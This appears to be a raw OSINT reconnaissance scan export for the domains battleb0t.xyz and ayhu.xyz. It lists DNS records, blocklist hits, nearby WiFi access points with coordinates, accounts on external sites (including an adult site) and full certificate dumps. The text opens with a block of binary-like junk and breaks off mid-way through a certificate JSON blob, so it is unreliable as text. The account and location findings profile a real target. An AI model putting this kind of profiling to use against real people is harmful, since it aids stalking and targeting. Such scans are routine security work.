ab-,,???-,,-,,-,,-,,-,,-,,-,,-,,,,,)))ac-,,211tttsrr.---,,-,,-,,-,,-,,-,,-,,,,,+11-,,-,,100ONNxww{{{SRR211-,,-,,-,,-,,-,,-,,-,,-,,-,,\'\'\'\n$OP-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,))));;8!\\]-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,...2&EF-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,)))s,..-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,,,,,,,\'\'\'\nA-++-,,,++-,,-,,-,,-,,-,,-,,-,,-,,,++-,,-++)))\ns""")))J-++\n++-\n\n\n++\n++-\n\n\n++-++***I"""(0` U\'\'\'\n%%%")))P+++|-++-++-++-\n\n-\n\n-++-++-+++++|)))P%%%"\'\'\'\nU)))2+++j-,,,++-,,,++-,,-,,-,,-,,-,,-,,-,,-,,,++-,,,++-,,+++j)))2 ***-++,**-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,,**-++***111.++d,,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,,,,.++d111.))8-,,,++-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,,++-,,.**7333/,,L,++-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,,++/,,L333....++d-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,.++d...333.++d-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,-,,.++d333 | 104.196.30.220 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Chris (Net ID: 00:1D:D1:A7:3B:10) | 32.8608, -79.9746 |
| 2023-05-12 02:56:54 | IPv6 Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 2606:4700:3031::ac43:8709 | www.ayhu.xyz |
| 2023-05-12 03:03:24 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | 000.lt | 000.lt |
| 2023-05-12 03:32:18 | Malicious Affiliate | Yes | abuse.ch | 0 | 1 | 4 | 0 | None | abuse.ch URLhaus (Domain) [cdn-185-199-109-154.github.com]
https://urlhaus.abuse.ch/downloads/csv_recent/ | cdn-185-199-109-154.github.com |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Mariner (Net ID: 00:14:C1:0D:F8:10) | 40.2024, 29.0398 |
| 2023-05-12 03:01:17 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.153): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:09:43 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 123.97.148.34.bc.googleusercontent.com | 34.148.97.123 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:00:C5:D7:47:EC) | 37.7642, -122.3993 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | XFINITY (Net ID: 00:0D:67:33:68:5F) | 39.0469, -77.4903 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.125): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES (Net ID: 00:12:BF:30:97:DD) | 40.2024, 29.0398 |
| 2023-05-12 02:57:25 | Internet Name | No | Certificate Transparency | 0 | 1 | 1 | 0 | None | nuke.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:53:20 | IP Address | No | Mnemonic PassiveDNS | 28 | 0 | 2 | 0 | None | 207.154.228.169 | kekw.battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | BDSMLR (Category: XXXPORNXXX)
https://login.bdsmlr.com | login |
| 2023-05-12 02:44:15 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4d:72:d7:7c:dd:a7:02:dd:5a:67:f2:a2:3b:bd:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1
Validity
Not Before: Feb 21 00:00:00 2023 GMT
Not After : Mar 20 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:b8:b0:60:0e:1a:2f:f1:b1:86:4b:64:ec:11:9f:
a6:79:be:e8:87:f1:88:c5:b4:49:9b:10:bb:ca:af:
ea:af:be:54:0c:78:43:7f:ca:7b:4e:45:5b:0b:24:
29:f1:bb:23:fc:19:a4:c7:6c:70:49:76:53:d3:09:
23:65:b2:48:7b:b6:1c:aa:07:1a:e2:79:1a:f9:7a:
5e:e7:16:f8:a6:4a:d5:39:a3:e2:0d:f7:57:ef:ed:
f8:08:76:5b:52:da:8b:d0:e6:1e:6e:2f:f9:0f:99:
4b:6a:52:ca:34:e1:a4:c9:20:33:d3:97:e8:7a:77:
c5:03:10:26:41:82:61:47:a2:af:c4:56:3f:76:a2:
38:cb:b2:70:ae:72:7a:43:c1:7e:27:a3:5e:d6:e3:
f6:e7:a5:30:70:bd:2a:96:27:7a:7b:fb:40:d2:57:
77:af:23:12:27:42:3a:c6:0b:6a:8c:bd:ba:2d:ee:
3f:9f:15:ee:62:57:a4:a6:95:50:af:43:b0:ac:76:
b8:e1:0e:d9:ff:56:ec:74:50:86:b5:1f:96:2c:d1:
95:05:e5:b7:05:67:93:4e:9e:f2:5a:38:1f:a7:8f:
43:5a:de:3c:57:da:48:7a:50:c6:88:38:15:c8:97:
2c:2c:ec:f8:39:09:36:bd:19:8d:03:56:41:66:07:
24:e3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:B7:6B:A2:EA:A8:AA:84:8C:79:EA:B4:DA:0F:98:B2:C5:95:76:B9:F4
X509v3 Subject Key Identifier:
8D:02:1C:75:5A:CD:C6:A6:41:78:69:28:C3:F7:AA:A7:98:3B:D5:BB
X509v3 Subject Alternative Name:
DNS:*.github.io, DNS:github.io, DNS:*.github.com, DNS:github.com, DNS:www.github.com, DNS:*.githubusercontent.com, DNS:githubusercontent.com
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Feb 21 15:03:41.179 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:AA:7E:67:D2:3B:C3:31:79:E5:59:FD:
F2:73:AA:A0:41:A7:E5:6A:79:10:D4:39:40:55:1B:24:
D3:3A:7E:37:7B:02:21:00:94:F4:4B:6E:E6:98:65:25:
A6:A3:62:0C:00:CF:F8:9A:3C:0B:A9:18:1C:5F:BB:53:
A4:D8:EF:86:C7:5C:70:1A
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 73:D9:9E:89:1B:4C:96:78:A0:20:7D:47:9D:E6:B2:C6:
1C:D0:51:5E:71:19:2A:8C:6B:80:10:7A:C1:77:72:B5
Timestamp : Feb 21 15:03:41.162 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:82:E0:7E:5D:05:40:34:18:F6:30:F7:
09:CD:BC:FE:2C:13:EB:90:30:CE:10:ED:E8:A7:9D:A3:
74:75:12:5B:72:02:20:5D:1F:9D:87:56:AA:F7:6D:9A:
04:0D:4A:7B:35:DE:90:29:A5:D4:16:A7:8F:DF:FE:37:
AB:35:8B:24:23:B9:2B
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Feb 21 15:03:41.130 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:13:FF:00:36:A8:61:87:48:A6:6A:04:09:
BC:E3:3E:AA:13:E7:46:3D:06:75:68:23:18:E7:6A:45:
49:F7:30:F1:02:20:3F:F4:9C:8A:E6:46:D3:65:F6:98:
13:BF:9A:20:D3:DA:10:A9:E3:2E:5D:DA:C7:3B:14:4E:
4F:4E:1C:82:A5:B3
Signature Algorithm: sha256WithRSAEncryption
37:a4:1b:11:22:9f:fc:9f:c9:67:07:8f:aa:86:13:9f:e0:08:
1d:6e:0c:8d:65:fb:03:79:50:c6:76:ba:30:90:a0:a4:1c:79:
13:07:b9:5a:18:8d:97:4c:05:71:8a:d0:22:17:c6:19:a2:22:
8b:03:f6:2c:84:71:6c:55:df:e2:99:43:65:e5:d7:b7:b7:37:
4c:c6:c8:e5:f1:d8:a7:7b:07:5d:eb:b8:1c:50:a4:a3:8e:f0:
4c:f8:b8:6a:72:59:be:43:0e:8a:de:b5:5e:8f:9e:3f:5a:43:
64:82:cc:e0:de:76:f4:be:a6:12:0a:06:68:bb:77:e1:4c:ef:
4b:4d:67:af:f6:72:c7:6b:1b:9c:48:53:a7:7f:ed:76:18:5c:
f0:f6:c6:4c:24:53:57:57:e1:42:a6:3d:ae:e1:f5:93:f2:6a:
fa:29:72:01:3e:b7:06:f1:2f:1a:0e:91:c5:ec:35:bf:f5:da:
33:95:de:24:12:0d:f5:c3:23:8d:40:82:d1:5c:eb:de:0a:08:
e8:e5:83:e5:0a:8b:3a:5e:98:4e:77:4f:9f:dc:ab:7e:ce:a8:
28:4f:aa:79:4f:c9:be:8f:60:88:6e:6b:f9:20:6c:7f:38:96:
d6:da:d7:11:03:43:d8:b8:51:87:ce:32:22:4d:64:4c:c4:75:
27:d0:e3:df
| 185.199.111.153 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/fredo.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Twitter (Category: social)
https://twitter.com/Altpapier | Altpapier |
| 2023-05-12 02:48:53 | Malicious Co-Hosted Site | Yes | VirusTotal | 0 | 0 | 2 | 0 | None | VirusTotal [githubusercontent.com]
https://www.virustotal.com/en/domain/githubusercontent.com/information/ | githubusercontent.com |
| 2023-05-12 02:45:35 | Raw DNS Records | No | DNS Raw Records | 0 | 0 | 1 | 0 | None | ayhu.xyz. 86400 IN NS brett.ns.cloudflare.com.
ayhu.xyz. 86400 IN NS leanna.ns.cloudflare.com. | ayhu.xyz |
| 2023-05-12 03:09:55 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | plesk.keyubu.net | 87.248.157.103 |
| 2023-05-12 02:54:15 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | www.battleb0t.xyz |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | TF2 Backpack Examiner (Category: gaming)
http://www.tf2items.com/id/battleb0t/ | battleb0t |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | x-github-request-id: 1AD4:4FA0:AFAB37:106D10A:645DA7F4 | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:31:19 | Malicious IP on Same Subnet | Yes | blocklist.de | 0 | 0 | 4 | 0 | None | blocklist.de List [64.226.80.0/20]
http://lists.blocklist.de/lists/all.txt | 64.226.80.0/20 |
| 2023-05-12 02:44:05 | Raw Data from RIRs | No | CertSpotter | 10 | 0 | 1 | 0 | None | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'MIIFKjCCBBKgAwIBAgISA5eZXGCsQGj4st4KZ3rat9EWMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzAyNTNaFw0yMzA1MjUwMzAyNTJaMB4xHDAaBgNVBAMTE2ZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDtvNBxdfnBUXlJ+CVs4kt6BeErbHlEmP+yzLzX2iclKTfHuoDL4Xy4TTeivJNE67xi/0fLIeo9BUwEV4KTW6klKfuYM7AEdKq8mmRex+Js5ewq50Br4XWTObPPuOkRKebRnghWVBafwR0f9fbKSDqUUwMdv1KvbiedgI3wVyjU8AE09DlZSt+fAEeHmjk4wY+EigILsm5cNqL2NebSI2spsRWqhqNb6zDMr7jf1Q6Pjil+DSEo0NJMcVsZAZvcuZCIffxdPnJE5kYR3eb9pUKjByTnKdkpHPNyd4vLC99FNAuBqADe8BN0G78vYa1lcyk+BbXDkCiMlu/Lswa6m2v3AgMBAAGjggJMMIICSDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFMSFgqNe7U1U6Q29Aqxnsvrz4Vg/MB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMB4GA1UdEQQXMBWCE2ZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggECBgorBgEEAdZ5AgQCBIHzBIHwAO4AdQC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBlpBHAAAEAwBGMEQCICjxcLLm9aGcwyq5mLfK3kYGig39XVFiap6vpxj4VtGwAiAhpNN7m5SlM1cl6vnpa33bPptwrJlHu2Ch2NSf4J/0RAB1AK33vvp8/xDIi509nB4+GGq0Zyldz7EMJMqFhjTr3IKKAAABhoGWkIMAAAQDAEYwRAIgPen/cKNLJEXeMs3B69ZoUOiQORdwZS/DjifvjwosEkICIGO9t4hTEa50wIw+3Zov1uU0pIyiq0OMZH6b0o6QCM5gMA0GCSqGSIb3DQEBCwUAA4IBAQB+MVu1xgwWJwv1GrOAp+9eXxuHOLeKvlxLKj8oK0+HX8K007e++Cj1FcezPz1AtAOklQYBGlgfdTZL7GVa4P2wv0Hj/1dO3QVHLOV0yFpYGdZTYfaNDhkpXd2yE+jFTH5o3PK0BVoTjtIuTl6BEKWGjzAw92FKb1wXDaTvEwIFSLAYrJzfJHAS40SsMVT1tpL07LbnFpMjx7h+UVz3BTMcDnqzPe0hA9K8pb8QgR9MedQ6c7mTn1eLmOo+dDlwmT06wPJN4VXt3ElOpjmlguotbukXxnJ17BBy0Mk+uTBpvC9wBjy6MbbBDEXmkoh4VjrUDNIyuEk388RtFWlUmQrZ', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': u'MIIFMTCCBBmgAwIBAgISBJEIZbRWlOOJN2vI7lr89IBSMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjQwMzA1MTFaFw0yMzA1MjUwMzA1MTBaMCExHzAdBgNVBAMTFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCXS5qUM658XpEb2FQiye1Pjdwc6oLnwWa4DnrXaX6XESwapQ5kFhLVlLMj8jbUT+vVMlCs5NdmG+PakXkEZvQt+j5F9EiRGo2AgsrdZhjN8p2HDZYJNvCQUHSzj9HUq+U8uqatV2IiK2DebnYEAl36UoC3YWvKiQ5ROMPyTcGPPlwvhux67sSpCWf+OjYs9HHdY1LHfiQTO/hkrA8XZYtPEtu6i5bXp9Nc/Y/pJrDB086upICbjZsf9spKiE++7SgvRRKN7ShK4dcK0cxPOA/6ky2NSpI6iIIBJKdiUpWIy/Uh604fFFn7oPNTbG4g4coLg0Y2NMYiFxvY5oIkaMplAgMBAAGjggJQMIICTDAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFNUp10YCZXNl/PWnfC5vlnnYZ6TmMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCEGA1UdEQQaMBiCFm9sZGZsdWlkLmJhdHRsZWIwdC54eXowTAYDVR0gBEUwQzAIBgZngQwBAgEwNwYLKwYBBAGC3xMBAQEwKDAmBggrBgEFBQcCARYaaHR0cDovL2Nwcy5sZXRzZW5jcnlwdC5vcmcwggEDBgorBgEEAdZ5AgQCBIH0BIHxAO8AdgC3Pvsk35xNunXyOcW6WPRsXfxCz3qfNcSeHQmBJe20mQAAAYaBmKzyAAAEAwBHMEUCICWgaft/PmN9oILwvZn6/4Qgr8WGgSRL98ur+169a4dWAiEAilZEKCsL5dY69BV+Cjy6gEc40xNl1o6o5QEE0+3XKCQAdQB6MoxU2LcttiDqOOBSHumEFnAyE4VNO9IrwTpXo1LrUgAAAYaBmK0EAAAEAwBGMEQCIEhQdyenjelORFvktFZQ+yD8yP0PS9xoCKRWpUv1pUezAiBBtKAPIhxp6PP7YLKBYWLg3Sg3E350KyZ04f3lTSlh5zANBgkqhkiG9w0BAQsFAAOCAQEAYbTvc/w81jb1dYAMM4uaBQvE73IdaXSV/QqEvbi5PBKH0+sttdJjKilgWcQRHA/D+3kvikNXOGLYLmg0u2wOeuP4PfXBBaVtk7mzSCKOozlm5qWe3OKYNX6z4ceyFrewLnBQTuqT0PhcaWwb0j7u2mQfrZfIvhc4pu2SnjvbZ8iwX+av/fdXknuHPb/EwSETusTYhaNj3JDu3z0qvANOuhuMDBZ+WOOsf9w7QBgfdJjVxPoymZWgZB5bTaj1eTMuP0PcjQ59KCV0epMnUy5rrk2BwTzgzUICbfza81JX1bFwjhqRFcgbk81AuP8p58YFrWOMyOzX6Ygzo11DodW5IA==', u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'MIIFNTCCBB2gAwIBAgISBLY5M6/eHjLz/C523LwIUYYQMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjUwMTM5MjVaFw0yMzA1MjYwMTM5MjRaMBgxFjAUBgNVBAMTDWJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrxxsM7cYB+Oqps88IF0+iy3w0xGYS5u/zmBd5yWXuZkwfmpJ9M+4H+i4VYve08x/VTy6xZ6hJQr/jzJq3MEbCaPUoqWRpb0xLZCTJ3O1Gn6Qfwu9vNtC8aSe44tYYcEAstPXuj/cNjG4Dkudd1j68u8lbKBCgWvY39eGeFSNybo5pAQmkjKTJ19sFAZBIS5AgjDh6CmB0eRgmMI5gCxe5JKCA3z8UANMJ5zRHNWN8VNKgneFX0csT0zwwJJeO6jQAn8xsDGr3VLxeYNxGMcIJ3tnD42MejxzFkJDo2oa+ffHDHxqGaZsL4LIMRwjIklkrZi/6oTihLxBl9pf9FoczAgMBAAGjggJdMIICWTAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFGNOFYVWWqSUAsIWQqSll5o4AleXMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCsGA1UdEQQkMCKCDWJ